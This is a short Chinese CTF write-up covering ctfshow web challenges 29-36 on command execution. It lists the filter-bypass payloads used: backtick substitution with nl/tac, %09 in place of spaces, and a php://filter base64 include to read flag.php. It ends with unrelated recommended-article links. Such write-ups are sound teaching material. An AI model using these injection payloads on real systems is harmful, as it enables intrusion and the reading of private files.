ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

复制代码
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET"1"?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET1?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
YYYing.8 小时前
【C++大型项目之高性能服务器框架 (七) 】Socket与ByteArray模块
服务器·c++·后端·框架·高性能·c/c++
摇滚侠8 小时前
Linux 零基础教程 09、11、77
linux·运维·服务器
Lottie20268 小时前
电商自动化提质增效:API接口落地的核心价值与实战用法
运维·自动化
Hardworking66610 小时前
第6章 数据工程
运维·服务器·数据库·数据工程
jieyucx10 小时前
Docker 入门第六阶段:综合实战项目
运维·docker·容器
美丽的欣情11 小时前
RK3588 Debian 交叉编译环境搭建(Windows + VMware Debian + CMake)
运维·windows·debian
嵌入式学习和实践11 小时前
嵌入式 Linux 调闭源 SDK 怕崩?用 dlopen 把第三方动态库库“隔离“起来
linux·三方库
_kerneler11 小时前
cgroup :限制cpu原理
java·服务器·前端
小樱花的樱花11 小时前
Linux 多线程编程:互斥锁(Mutex)详解
linux·c语言·开发语言
TlSfoward12 小时前
TLSFOWARD自动化抓包工具
运维·自动化